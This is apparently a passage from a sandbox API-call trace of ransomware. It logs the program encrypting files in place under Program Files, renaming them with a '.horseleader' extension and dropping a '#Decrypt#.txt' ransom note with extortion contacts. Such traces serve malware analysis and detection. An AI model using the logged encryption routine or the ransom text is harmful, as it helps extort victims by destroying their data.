dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0246.539] StrStrW (lpFirst="CONCRETE.ELM", lpSrch=".txt") returned 0x0 [0246.539] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45528) returned 1 [0246.539] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.542] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.542] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.543] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.543] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.544] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x11d8, lpOverlapped=0x0) returned 1 [0246.544] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffee28, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x11d8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x11d8, lpOverlapped=0x0) returned 1 [0246.544] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.544] CloseHandle (hObject=0x1a4) returned 1 [0246.545] GetProcessHeap () returned 0x780000 [0246.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.545] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM.horseleader") returned 93 [0246.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm.horseleader")) returned 1 [0246.546] GetProcessHeap () returned 0x780000 [0246.546] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.546] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x60440c50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CONCRETE.INF", cAlternateFileName="")) returned 1 [0246.546] lstrcmpiW (lpString1="CONCRETE.INF", lpString2="Windows") returned -1 [0246.546] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0246.546] StrStrIW (lpFirst="CONCRETE.INF", lpSrch=".horseleader") returned 0x0 [0246.546] lstrcmpW (lpString1="CONCRETE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.546] lstrcmpW (lpString1="CONCRETE.INF", lpString2="_uninstalling_.png") returned 1 [0246.546] lstrlenW (lpString=".testttjffg") returned 11 [0246.546] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF", lpSrch=".testttjffg") returned 0x0 [0246.546] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.546] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0246.547] StrStrW (lpFirst="CONCRETE.INF", lpSrch=".txt") returned 0x0 [0246.547] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=480) returned 1 [0246.547] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e0, lpOverlapped=0x0) returned 1 [0246.548] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e0, lpOverlapped=0x0) returned 1 [0246.549] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.549] CloseHandle (hObject=0x1a4) returned 1 [0246.549] GetProcessHeap () returned 0x780000 [0246.549] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.549] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF.horseleader") returned 93 [0246.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\CONCRETE\\CONCRETE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf.horseleader")) returned 1 [0246.553] GetProcessHeap () returned 0x780000 [0246.553] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.553] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x507, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.553] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.553] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0246.553] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.553] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.553] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.553] lstrlenW (lpString=".testttjffg") returned 11 [0246.553] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.554] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.554] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0246.554] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.555] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1287) returned 1 [0246.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x507, lpOverlapped=0x0) returned 1 [0246.605] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x507, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x507, lpOverlapped=0x0) returned 1 [0246.605] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.606] CloseHandle (hObject=0x1a4) returned 1 [0246.606] GetProcessHeap () returned 0x780000 [0246.606] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.606] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.horseleader") returned 92 [0246.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.horseleader")) returned 1 [0246.607] GetProcessHeap () returned 0x780000 [0246.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.607] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6fb3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.607] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.607] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0246.607] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0246.607] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.607] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.607] lstrlenW (lpString=".testttjffg") returned 11 [0246.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0246.608] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.608] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=28595) returned 1 [0246.608] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.612] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fb3, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe04d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1fb3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fb3, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.613] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.613] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.613] CloseHandle (hObject=0x1a4) returned 1 [0246.613] GetProcessHeap () returned 0x780000 [0246.613] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.613] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.horseleader") returned 93 [0246.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.horseleader")) returned 1 [0246.614] GetProcessHeap () returned 0x780000 [0246.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.614] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6fb3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.614] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.614] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\#Decrypt#.txt") returned 82 [0246.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.615] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
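\r\ntell your unique ID\r\n") returned 1508 [0246.615] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.616] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.616] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.617] CloseHandle (hObject=0x158) returned 1 [0246.617] GetProcessHeap () returned 0x780000 [0246.617] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.617] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0246.617] lstrcmpiW (lpString1="DEEPBLUE", lpString2="Windows") returned -1 [0246.617] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned 68 [0246.617] lstrcmpW (lpString1="DEEPBLUE", lpString2=".") returned 1 [0246.617] lstrcmpW (lpString1="DEEPBLUE", lpString2="..") returned 1 [0246.617] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.617] 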